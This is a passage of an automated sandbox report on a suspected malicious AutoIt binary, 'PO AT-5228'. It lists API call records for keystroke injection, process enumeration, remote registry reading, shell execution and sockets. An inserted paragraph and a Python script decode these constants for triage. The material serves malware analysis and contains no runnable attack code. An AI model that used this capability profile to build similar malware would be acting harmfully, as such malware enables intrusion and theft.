                                                                                          • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BC242F
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00BC243E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 4082843840-2766056989
                                                                                        • Opcode ID: e0ac2da01158e33e0c321b0437d8774cf54903a47d4127ac41ca5045ad7fc8a8
                                                                                        • Instruction ID: 660fcf5dfd5ae73e46ebd0221f6392b3f8b9e5884a0b4ab0bbe2b5972886cff6
                                                                                        • Opcode Fuzzy Hash: e0ac2da01158e33e0c321b0437d8774cf54903a47d4127ac41ca5045ad7fc8a8
                                                                                        • Instruction Fuzzy Hash: F5714D75A00619DFCF05EFA4C891AAEBBF5FF48310F1084A9E859AB351DB34AD40CB94
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00BA3DE7
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA3DFC
                                                                                        • SetKeyboardState.USER32(?), ref: 00BA3E5D
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00BA3E8B
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00BA3EAA
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00BA3EF0
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BA3F13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: d88e2499d913dae74a9d66834ffad8c672322bafec5af31fcb24d5fc55d3ec02
                                                                                        • Instruction ID: 161c5bf7d3672d2a02555e5e82b2b689f7162c0cdb04096cd61a15594cac1358
                                                                                        • Opcode Fuzzy Hash: d88e2499d913dae74a9d66834ffad8c672322bafec5af31fcb24d5fc55d3ec02
                                                                                        • Instruction Fuzzy Hash: 1851C1A0A1C7D53DFB3643288845BBA7EE99B07B04F0845C9F0D55A8C2D7E5AEC4D760
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00BA3C02
                                                                                        • GetKeyboardState.USER32(?), ref: 00BA3C17
                                                                                        • SetKeyboardState.USER32(?), ref: 00BA3C78
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BA3CA4
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BA3CC1
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BA3D05
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BA3D26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: 8ba907bfa136d3caed965415ae1b4cad32806044cd4c924b669a744da24a63ae
                                                                                        • Instruction ID: b561571da5cf7ead1da1f629ac72c6c33f1ef31b4a2db53146f0872ef2e93e5d
                                                                                        • Opcode Fuzzy Hash: 8ba907bfa136d3caed965415ae1b4cad32806044cd4c924b669a744da24a63ae
                                                                                        • Instruction Fuzzy Hash: 9451F6A050C7D57DFB3287248C56BBABED9EB07B00F0884D9F0D55A8C2E695EE84D760
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 6227f75828aea56832cc7578e1e83c4f237b0a25a05936e825c49f4e59ba051b
                                                                                        • Instruction ID: ee0c9c6c9aabc0544f1499c003b4f43b8c9172e6251c512251019ab395d61c03
                                                                                        • Opcode Fuzzy Hash: 6227f75828aea56832cc7578e1e83c4f237b0a25a05936e825c49f4e59ba051b
                                                                                        • Instruction Fuzzy Hash: A6414C66D29214BADB10BBF48C469CFB7ECEF05310F5089E6E905E3121FA34E615C7A9
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BC8FE7
                                                                                        • GetWindowLongW.USER32(0193E750,000000F0), ref: 00BC901A
                                                                                        • GetWindowLongW.USER32(0193E750,000000F0), ref: 00BC904F
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BC9081
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BC90AB
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00BC90BC
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BC90D6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        • Opcode ID: 505704c3579ecdf50e8c8f6dbb7d597dac0af82fe26ec8d06e5dd59aebec643f
                                                                                        • Instruction ID: b2b65056ec6384868d781082fee92e4be252cae45960e7f52ffd7406e9f8cdf0
                                                                                        • Opcode Fuzzy Hash: 505704c3579ecdf50e8c8f6dbb7d597dac0af82fe26ec8d06e5dd59aebec643f
                                                                                        • Instruction Fuzzy Hash: 92312435640215EFEB21CF58DC88F6837E6FB5A714F1802A8F9198F2B1CBB1A841DB41
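The two PostMessageW routines listed above (call sites starting at 00BA3DE7 and 00BA3C02) read more easily once the raw constants are decoded: message 0x101 is WM_KEYUP and 0x100 is WM_KEYDOWN, and the wParams 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN. Each routine therefore snapshots the keyboard state, rewrites it with SetKeyboardState, and posts a synthetic release (or press) of every modifier key to a window. That is the shape of a keystroke-injection helper in a scripting runtime, consistent with the report's own verdict that this is a compiled AutoIt binary, rather than of user input. The Python script below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses the "APIs" listing format used on this page, decodes the message and virtual-key constants, and flags functions that show the keyboard-state-plus-modifier-key pattern. The embedded input is constructed from lines copied from four records on this page; the constant names are the standard winuser.h/commctrl.h values. One caveat a reader should keep in mind: BM_, CB_, UDM_ and CCM_ messages share numeric ranges with other control classes, and the listing does not show the target window's class, so those names are probable rather than certain.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox IDA-plugin report and
decode the raw Win32 message and virtual-key constants they carry.

Added example; not part of the Joe Sandbox report or of the analysed sample."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: API lines copied from four function records on this page
# (the two PostMessageW routines, the BM_GETCHECK routine and the ShellExecuteExW
# routine), each preceded by the "APIs" header that separates records.
SAMPLE_REPORT = """\
APIs
• GetParent.USER32(?), ref: 00BA3DE7
• GetKeyboardState.USER32(?), ref: 00BA3DFC
• SetKeyboardState.USER32(?), ref: 00BA3E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00BA3E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00BA3EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00BA3EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00BA3F13
APIs
• GetParent.USER32(00000000), ref: 00BA3C02
• GetKeyboardState.USER32(?), ref: 00BA3C17
• SetKeyboardState.USER32(?), ref: 00BA3C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00BA3CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00BA3CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00BA3D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00BA3D26
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BC8FE7
• GetWindowLongW.USER32(0193E750,000000F0), ref: 00BC901A
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BC90AB
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00BC90D6
APIs
• _memset.LIBCMT ref: 00BC225A
• ShellExecuteExW.SHELL32(?), ref: 00BC2368
  • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
• CloseHandle.KERNEL32(00000000), ref: 00BC242F
"""

# One listing line: optional "Part of subcall function X:" prefix, API.MODULE,
# optional "(args)" (some LIBCMT lines have none), then "ref: <call site>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Standard Win32 values (winuser.h / commctrl.h). Control-specific names are only
# meaningful if the target window really is that control class, which the listing
# does not show.
MESSAGES: Dict[int, str] = {
    0x0030: "WM_SETFONT",
    0x00F0: "BM_GETCHECK",
    0x00F1: "BM_SETCHECK",
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0142: "CB_SETEDITSEL",
    0x0469: "UDM_SETBUDDY",
    0x2001: "CCM_SETBKCOLOR",
}
VKEYS: Dict[int, str] = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
MODIFIER_VKS = set(VKEYS)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]          # None where the plugin printed "?"
    ref: int                           # address of the call site
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    entry: Optional[int] = None        # ref of the first direct call; the listing gives no function start
    calls: List[ApiCall] = field(default_factory=list)


def _parse_args(raw: Optional[str]) -> List[Optional[int]]:
    """'00000000,00000100,?' -> [0, 0x100, None]."""
    if not raw:
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]


def parse_report(text: str) -> List[FunctionRecord]:
    """Split the listing on its "APIs" headers and parse every call line under each."""
    functions: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            functions.append(current)
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue  # hashes, dump-source lines and headers are not call lines
        call = ApiCall(m["api"], m["module"], _parse_args(m["args"]), int(m["ref"], 16),
                       int(m["sub"], 16) if m["sub"] else None)
        current.calls.append(call)
        if current.entry is None and call.subcall_of is None:
            current.entry = call.ref
    return functions


def decode_call(call: ApiCall) -> str:
    """Render a call with its message and virtual-key constants named, e.g.
    'PostMessageW(WM_KEYUP, VK_SHIFT)'; args are (hWnd, Msg, wParam, lParam)."""
    if call.api in ("PostMessageW", "SendMessageW") and len(call.args) >= 2 and call.args[1] is not None:
        msg = call.args[1]
        name = MESSAGES.get(msg, "0x%04X" % msg)
        if msg in (0x0100, 0x0101) and len(call.args) >= 3 and call.args[2] is not None:
            vk = call.args[2]
            return "%s(%s, %s)" % (call.api, name, VKEYS.get(vk, "VK 0x%02X" % vk))
        return "%s(%s)" % (call.api, name)
    return call.api


def synthetic_modifier_keys(fn: FunctionRecord) -> bool:
    """True when a function reads and rewrites the keyboard state and posts
    WM_KEYDOWN/WM_KEYUP for modifier keys: a keystroke-injection helper, not user input."""
    names = {c.api for c in fn.calls}
    if not {"GetKeyboardState", "SetKeyboardState"} <= names:
        return False
    return any(c.api == "PostMessageW" and len(c.args) >= 3
               and c.args[1] in (0x0100, 0x0101) and c.args[2] in MODIFIER_VKS
               for c in fn.calls)


def triage(text: str) -> List[dict]:
    """Decode every function record and attach the modifier-key verdict."""
    return [{
        "entry": "%08X" % fn.entry if fn.entry is not None else "?",
        "calls": [decode_call(c) for c in fn.calls],
        "synthetic_modifier_keys": synthetic_modifier_keys(fn),
    } for fn in parse_report(text)]


if __name__ == "__main__":
    for rec in triage(SAMPLE_REPORT):
        flag = "  <-- synthetic modifier keys" if rec["synthetic_modifier_keys"] else ""
        print(rec["entry"], ", ".join(rec["calls"]) + flag)
```

Run against a whole exported report, the script yields one decoded line per function; the two flagged records here are the ones a reviewer would pair with the report's keylogging-related signatures when deciding which functions to open first in the disassembler.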
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA08F2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA0918
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BA091B
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00BA0939
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00BA0942
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA0967
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00BA0975
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: c3851bbb005a90207e80aa86ae65bfffc4748889ba8ff6a7c4ce0a51163aae39
                                                                                        • Instruction ID: b1bb1961d4b641f9aff0d6717098e42e87f5ec628f20578bf47429219af32855
                                                                                        • Opcode Fuzzy Hash: c3851bbb005a90207e80aa86ae65bfffc4748889ba8ff6a7c4ce0a51163aae39
                                                                                        • Instruction Fuzzy Hash: 04219576605219AFAB10AF6CCC88DBB73ECEB09360F408165F919DB291DA70EC458B64
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        • Opcode ID: 86c03ff1bb85ece0ab4d366362d96741bb61785fcc47ad49d63b411cb4432498
                                                                                        • Instruction ID: cdc7abc0ff97038a5cd43a92ded71dca03f954fb46b06541c7a68da247b32804
                                                                                        • Opcode Fuzzy Hash: 86c03ff1bb85ece0ab4d366362d96741bb61785fcc47ad49d63b411cb4432498
                                                                                        • Instruction Fuzzy Hash: BC214C3150821167D720BB3CDC53EBB73D9EF76300F5084AAFA4997151EA55D942C395
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA09CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00BA09F1
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00BA09F4
                                                                                        • SysAllocString.OLEAUT32 ref: 00BA0A15
                                                                                        • SysFreeString.OLEAUT32 ref: 00BA0A1E
                                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00BA0A38
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00BA0A46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                        • String ID:
                                                                                        • API String ID: 3761583154-0
                                                                                        • Opcode ID: c07aa359213a5dfe24ce71bb22a5b539fda3b846c972379dfe919694ad8a221e
                                                                                        • Instruction ID: 70688c270800100ad8630b8bc1713932f93344e7a90b493f760140490261b126
                                                                                        • Opcode Fuzzy Hash: c07aa359213a5dfe24ce71bb22a5b539fda3b846c972379dfe919694ad8a221e
                                                                                        • Instruction Fuzzy Hash: 05215675614204AFDB10EFA8DCC9DAB77ECEF19360B408165F919CB2A1DA71EC418764
                                                                                        APIs
                                                                                          • Part of subcall function 00B7D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B7D1BA
                                                                                          • Part of subcall function 00B7D17C: GetStockObject.GDI32(00000011), ref: 00B7D1CE
                                                                                          • Part of subcall function 00B7D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7D1D8
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BCA32D
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BCA33A
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BCA345
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BCA354
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BCA360
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: a2e3048e9e6f3653eff9c9e54bd17f1810dad07da3dc4351030916423c3cc36f
                                                                                        • Instruction ID: 82c9999b836bb39f2502ea0cc6754ce35fd0f97c9b1fc38528c00e886974fa47
                                                                                        • Opcode Fuzzy Hash: a2e3048e9e6f3653eff9c9e54bd17f1810dad07da3dc4351030916423c3cc36f
                                                                                        • Instruction Fuzzy Hash: 681193B155011DBEEF155F60CC85EEB7F6DFF09798F014114BA08A60A0C6729C21DBA4
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 00B7CCF6
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B7CD37
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B7CD5F
                                                                                        • GetClientRect.USER32(?,?), ref: 00B7CE8C
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B7CEA5
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 3457dfce1c1077817e082b105808c16f6b307e7e25c9e002f4db249de7328358
                                                                                        • Instruction ID: 89218b3519f7503e80a41d1a37718a8927a63538b4a3051ada0336399255e1a1
                                                                                        • Opcode Fuzzy Hash: 3457dfce1c1077817e082b105808c16f6b307e7e25c9e002f4db249de7328358
                                                                                        • Instruction Fuzzy Hash: 8AB12B79900649DBDB10CFA8C5807EDBBF1FF08310F1495AEEC69AB254EB70AA50CB54
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00BC1C18
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00BC1C26
                                                                                        • __wsplitpath.LIBCMT ref: 00BC1C54
                                                                                          • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                                                        • _wcscat.LIBCMT ref: 00BC1C69
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00BC1CDF
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00BC1CF1
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1380811348-0
                                                                                        • Opcode ID: 56007f572cbdb9a3c0709c4e4c88074e075c6faec2a43b148434bfdf3399662d
                                                                                        • Instruction ID: 9bd5c0c28d3ae0e1458677c15b32dfd11676cd51f9d5b33046d1db5f8e4bf844
                                                                                        • Opcode Fuzzy Hash: 56007f572cbdb9a3c0709c4e4c88074e075c6faec2a43b148434bfdf3399662d
                                                                                        • Instruction Fuzzy Hash: 92515D715043409FD720EF24C885EABBBECEF88754F00496EF58AA7251EB70DA04CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC30AF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BC30EF
                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BC3112
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BC313B
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BC317E
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BC318B
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 3451389628-0
                                                                                        • Opcode ID: 80dbc3feb0dedeaee1561cd187526b1e84b2c40779bae25c6b2e97e03c894a0c
                                                                                        • Instruction ID: 9af0b76db08ea17d818b6b0e8e7a69b933fd39abf0df30c2f534b93722cbd49c
                                                                                        • Opcode Fuzzy Hash: 80dbc3feb0dedeaee1561cd187526b1e84b2c40779bae25c6b2e97e03c894a0c
                                                                                        • Instruction Fuzzy Hash: 6F516C31608300AFC700EF64C895E6ABBF9FF89700F04899DF595972A1DB75EA05CB52
                                                                                        APIs
                                                                                        • GetMenu.USER32(?), ref: 00BC8540
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00BC8577
                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BC859F
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00BC860E
                                                                                        • GetSubMenu.USER32(?,?), ref: 00BC861C
                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BC866D
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: 880629846b5d73d61b6d99afbfe254d6d4e14604060e43699ebc8d2c8ca66736
                                                                                        • Instruction ID: 0257b963ece2c2f2364c8a3d9b01b37f8feb8592086cc0f32cdfd66238ec0396
                                                                                        • Opcode Fuzzy Hash: 880629846b5d73d61b6d99afbfe254d6d4e14604060e43699ebc8d2c8ca66736
                                                                                        • Instruction Fuzzy Hash: 0F519D31A00615AFDF11EFA8C981EAEB7F4EF58310F1044A9E915BB351DF75AE418B90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA4B10
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BA4B5B
                                                                                        • IsMenu.USER32(00000000), ref: 00BA4B7B
                                                                                        • CreatePopupMenu.USER32 ref: 00BA4BAF
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00BA4C0D
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BA4C3E
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: 00a53abca6b22355aa08da592370cb9ed099c2facbdd5c779828997330dbddb5
                                                                                        • Instruction ID: d3436996cc140188b283f3143b8d1ecbf660ec9e6383c4ae4d261c39f625f708
                                                                                        • Opcode Fuzzy Hash: 00a53abca6b22355aa08da592370cb9ed099c2facbdd5c779828997330dbddb5
                                                                                        • Instruction Fuzzy Hash: F351D370609249EFCF20CF64C988BADBBF4EF86324F144199E4299B291E7F1D944CB61
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00BFDC00), ref: 00BB8E7C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8E89
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00BB8EAD
                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00BB8EC5
                                                                                        • _strlen.LIBCMT ref: 00BB8EF7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8F6A
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_strlenselect
                                                                                        • String ID:
